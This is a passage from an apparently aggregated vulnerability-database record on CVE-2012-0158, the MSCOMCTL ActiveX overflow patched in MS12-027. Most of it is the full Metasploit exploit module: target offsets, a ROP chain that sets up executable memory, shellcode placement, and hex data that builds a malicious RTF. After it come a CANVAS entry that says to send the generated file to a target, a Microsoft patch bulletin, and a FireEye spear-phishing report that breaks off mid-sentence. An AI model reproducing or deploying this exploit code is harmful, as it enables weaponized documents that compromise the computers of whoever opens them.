Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0158"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS12_027_MSCOMCTL_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS12-027 MSCOMCTL ActiveX Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\n RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\n in the wild on April 2012.\n\n This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office\n 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses\n \"msgr3en.dll\", which will load after office got load, so the malicious file must\n be loaded through \"File / Open\" to achieve exploitation.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'juan vazquez', # Metasploit module\n 'sinn3r' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-0158' ],\n [ 'OSVDB', '81125' ],\n [ 'BID', '52911' ],\n [ 'MSB', 'MS12-027' ],\n [ 'URL', 'http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment # add esp, -3500,\n 'Space' => 900,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true # no need\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # winword.exe v12.0.4518.1014 (No Service Pack)\n # winword.exe v12.0.6211.1000 (SP1)\n # winword.exe v12.0.6425.1000 (SP2)\n # winword.exe v12.0.6612.1000 (SP3)\n [ 'Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English',\n {\n 'Offset' => 270,\n 'Ret' => 0x27583c30, # jmp esp # MSCOMCTL.ocx 6.1.95.45\n 'Rop' => false\n }\n ],\n # winword.exe v14.0.6024.1000 (SP1)\n [ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English',\n {\n 'Ret' => 0x3F2CB9E1, # ret # msgr3en.dll\n 'Rop' => true,\n 'RopOffset' => 120\n }\n ],\n ],\n 'DisclosureDate' => '2012-04-10',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),\n ])\n end\n\n def stream(bytes)\n Rex::Text.to_hex(bytes).gsub(\"\\\\x\", \"\")\n end\n\n def junk(n=1)\n tmp = []\n value = rand_text(4).unpack(\"L\")[0].to_i\n n.times { tmp << value }\n return tmp\n end\n\n # Ikazuchi ROP chain (msgr3en.dll)\n # Credits to Abysssec\n # http://abysssec.com/files/The_Arashi.pdf\n def create_rop_chain\n rop_gadgets = [\n 0x3F2CB9E0, # POP ECX # RETN\n 0x3F10115C, # HeapCreate() IAT = 3F10115C\n # EAX == HeapCreate() Address\n 0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\n # Call HeapCreate() and Create a Executable Heap. After this call, EAX contain our Heap Address.\n 0x3F39AFCF, # CALL EAX # RETN\n 0x00040000,\n 0x00010000,\n 0x00000000,\n 0x3F2CB9E0, # POP ECX # RETN\n 0x00008000, # pop 0x00008000 into ECX\n # add ECX to EAX and instead of calling HeapAlloc, now EAX point to the RWX Heap\n 0x3F39CB46, # ADD EAX,ECX # POP ESI # RETN\n junk,\n 0x3F2CB9E0, # POP ECX # RETN\n 0x3F3B3DC0, # pop 0x3F3B3DC0 into ECX, it is a writable address.\n # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;)\n 0x3F2233CC, # MOV DWORD PTR DS:[ECX],EAX # RETN\n 0x3F2D59DF, #POP EAX # ADD DWORD PTR DS:[EAX],ESP # RETN\n 0x3F3B3DC4, # pop 0x3F3B3DC4 into EAX , it is writable address with zero!\n # then we add ESP to the Zero which result in storing ESP into that address,\n # we need ESP address for copying shellcode ( which stores in Stack ),\n # and we have to get it dynamically at run-time, now with my tricky instruction, we have it!\n 0x3F2F18CC, # POP EAX # RETN\n 0x3F3B3DC4, # pop 0x3F3B3DC4 ( ESP address ) into EAX\n # makes ECX point to nearly offset of Stack.\n 0x3F2B745E, # MOV ECX,DWORD PTR DS:[EAX] #RETN\n 0x3F39795E, # POP EDX # RETN\n 0x00000024, # pop 0x00000024 into EDX\n # add 0x24 to ECX ( Stack address )\n 0x3F39CB44, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN\n junk,\n # EAX = ECX\n 0x3F398267, # MOV EAX,ECX # RETN\n # mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location,\n # and the popping it into ESI ! now ESI point where shellcode stores in stack\n 0x3F3A16DE, # MOV DWORD PTR DS:[ECX],EAX # XOR EAX,EAX # POP ESI # RETN\n # EAX = ECX\n 0x3F398267, # MOV EAX,ECX # RETN\n 0x3F2CB9E0, # POP ECX # RETN\n 0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\n # makes EAX point to our RWX Heap\n 0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\n # makes EDI = Our RWX Heap Address\n 0x3F2B0A7C, # XCHG EAX,EDI # RETN 4\n 0x3F2CB9E0, # POP ECX # RETN\n junk,\n 0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\n # makes EAX point to our RWX Heap\n 0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\n # just skip some junks\n 0x3F38BEFB, # ADD AL,58 # RETN\n 0x3F2CB9E0, # POP ECX # RETN\n 0x00000300, # pop 0x00000300 into ECX ( 0x300 * 4 = Copy lent )\n # Copy shellcode from stack into RWX Heap\n 0x3F3441B4, # REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] # POP EDI # POP ESI # RETN\n junk(2), # pop into edi # pop into esi\n 0x3F39AFCF # CALL EAX # RETN\n ].flatten.pack(\"V*\")\n\n # To avoid shellcode being corrupted in the stack before ret\n rop_gadgets << \"\\x90\" * target['RopOffset'] # make_nops doesn't have sense here\n return rop_gadgets\n\n end\n\n def exploit\n\n ret_address = stream([target.ret].pack(\"V\"))\n\n if target['Rop']\n shellcode = stream(create_rop_chain)\n else\n # To avoid shellcode being corrupted in the stack before ret\n shellcode = stream(make_nops(target['Offset']))\n shellcode << stream(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string)\n shellcode << stream(make_nops(4))\n end\n shellcode << stream(payload.encoded)\n while shellcode.length < 2378\n shellcode += \"0\"\n end\n\n content = \"{\\\\rtf1\"\n content << \"{\\\\fonttbl{\\\\f0\\\\fnil\\\\fcharset0 Verdana;}}\"\n content << \"\\\\viewkind4\\\\uc1\\\\pard\\\\sb100\\\\sa100\\\\lang9\\\\f0\\\\fs22\\\\par\"\n content << \"\\\\pard\\\\sa200\\\\sl276\\\\slmult1\\\\lang9\\\\fs22\\\\par\"\n content << \"{\\\\object\\\\objocx\"\n content << \"{\\\\*\\\\objdata\"\n content << \"\\n\"\n content << \"01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000\"\n content << \"00000000000000000E0000\"\n content << \"\\n\"\n content << \"D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000\"\n content << \"00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF\"\n content << \"FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400\"\n content << \"72007900000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628\"\n content << \"0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00\"\n content << \"49006E0066006F000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000600000000000000\"\n content << \"03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000\"\n content << \"000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000001000000\"\n content << \"160000000000000043006F006E00740065006E007400730000000000000000000000000000000000\"\n content << \"000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000\"\n content << \"0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000\"\n content << \"11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000004C00690073007400\"\n content << \"56006900650077004100000000000000000000000000000000000000000000000000000000000000\"\n content << \"0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600\"\n content << \"1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080\"\n content << \"05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974\"\n content << \"6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000\"\n content << \"000000000000\"\n content << ret_address\n content << \"9090909090909090\"\n content << shellcode\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000\"\n content << \"\\n\"\n content << \"}\"\n content << \"}\"\n content << \"}\"\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(content)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb"}], "canvas": [{"lastseen": "2019-05-29T19:48:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0158"], "edition": 2, "description": "**Name**| ms12_027 \n---|--- \n**CVE**| CVE-2012-0158 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-027 MSCOMCTL.OCX ActiveX Buffer Overflow \n**Notes**| CVE Name: CVE-2012-0158 \nVENDOR: Microsoft \nNotes: \n \nYou shoud manually start a Universal listener for this exploit. \nThe listener IP and PORT should be declared in the module configuration \ndialog. \n \nTested on: \n* Windows XP Professional SP3 English with Office 2010 Standard \n* Windows 7 English. \n \nThe Universal Windows version needs the target to have Word opened \nfor a few seconds before executing the file. \n \nUsage: \nGenerate rtf file and send to target. \n \n \nVersionsAffected: Office 2003 to Office 2010 SP1 \nRepeatability: \nMSADV: MS12-027 \nReferences: http://technet.microsoft.com/en-us/security/bulletin/ms12-027 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 \nDate public: 04/10/2012 \nCVSS: 9.3 \n\n", "modified": "2012-04-10T21:55:00", "published": "2012-04-10T21:55:00", "id": "MS12_027", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_027", "type": "canvas", "title": "Immunity Canvas: MS12_027", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:43:29", "bulletinFamily": "microsoft", "cvelist": ["CVE-2012-0158"], "description": "<html><body><p>Resolves a vulnerability in MSCOMCTL.OCX could allow Remote Code Execution. This was released on April 10, 2012.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-027. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201204.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201204.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-027\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-027</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2></h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3> <br/><br/> The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/><br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/983807\" id=\"kb-link-8\">983807 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Analysis Services Service Pack 4 QFE: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/983808\" id=\"kb-link-9\">983808 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 GDR: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/983809\" id=\"kb-link-10\">983809 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 QFE: April 10, 2012 </li><li><a href=\"https://support.microsoft.com/en-us/help/2597112\" id=\"kb-link-11\">2597112 </a> MS12-027: Description of the security update for Microsoft Office 2003 Service Pack 3: April 10, 2012<br/><br/>Known issue in security update 2597112:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2598039\" id=\"kb-link-12\">2598039 </a> MS12-027: Description of the security update for Office 2010: April 10, 2012 <br/><br/>Known issue in security update 2598039:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2598041\" id=\"kb-link-13\">2598041 </a> MS12-027: Description of the security update for 2007 Microsoft Office system: April 10, 2012<br/><br/>Known issue in security update 2598041:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2641426\" id=\"kb-link-14\">2641426 </a> MS12-027: Description of the security update for Visual Basic 6: April 10, 2012<br/><br/>Known issue in security update 2641426:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\">Add or Remove Programs</strong> item or the <strong class=\"uiterm\">Programs and Features</strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2645025\" id=\"kb-link-15\">2645025 </a> MS12-027: Description of the security update for Microsoft BizTalk Server 2002: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2647488\" id=\"kb-link-16\">2647488 </a> MS12-027: Description of the security update for Fox Pro 8.0 Service Pack 1: April 10, 2012<br/><br/>Known issue in security update 2647488:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\"><span class=\"text-base\">Add or Remove Programs</span></strong> item or the <strong class=\"uiterm\"><span class=\"text-base\">Programs and Features</span></strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2647490\" id=\"kb-link-17\">2647490 </a> MS12-027: Description of the security update for Fox Pro 9.0 Service Pack 2: April 10, 2012<br/><br/>Known issue in security update 2647490:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\">Add or Remove Programs</strong> item or the <strong class=\"uiterm\">Programs and Features</strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2655547\" id=\"kb-link-18\">2655547 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2009: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2658674\" id=\"kb-link-19\">2658674 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2002: April 10, 2012 </li><li><a href=\"https://support.microsoft.com/en-us/help/2658676\" id=\"kb-link-20\">2658676 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2009 R2: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2658677\" id=\"kb-link-21\">2658677 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2007: April 10, 2012<br/><br/>Known issue in security update 2658677:<ul class=\"sbody-free_list\"><li>If you uninstall this security update, the version of Mscomctrl.ocx does not roll back to the original version.</li></ul></li></ul></div></body></html>", "edition": 2, "modified": "2012-05-23T21:51:36", "id": "KB2664258", "href": "https://support.microsoft.com/en-us/help/2664258/", "published": "2012-04-10T00:00:00", "title": "MS12-027: Vulnerability in MSCOMCTL.OCX could allow Remote Code Execution: April 10, 2012", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2017-11-17T14:44:06", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "**Introduction** \nOn May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets.\n\nThis group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. Proofpoint also discussed the threat actors, whom they call [Transparent Tribe](<https://www.proofpoint.com/us/threat-insight/post/Operation-Transparent-Tribe>), in a March blog post.\n\nIn this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government\u2019s [7th Central Pay Commission (CPC)](<http://zeenews.india.com/business/news/economy/7th-pay-commission-govt-employees-likely-to-get-huge-pay-checks-by-june-july-2016_1880390.html>). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.\n\n**Malware Delivery Method** \nIn all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the [CVE-2012-0158 vulnerability](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to drop a malicious payload.\n\nIn previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.\n\nThe email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests the recipient to open the attachment associated with the 7th Pay Commission. Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other non-public addressees through other means.\n\n** \nFigure 1: Contents of the Email**\n\nA review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.\n\n**Exploit Analysis** \nDespite being an older vulnerability, many threat actors continue to leverage 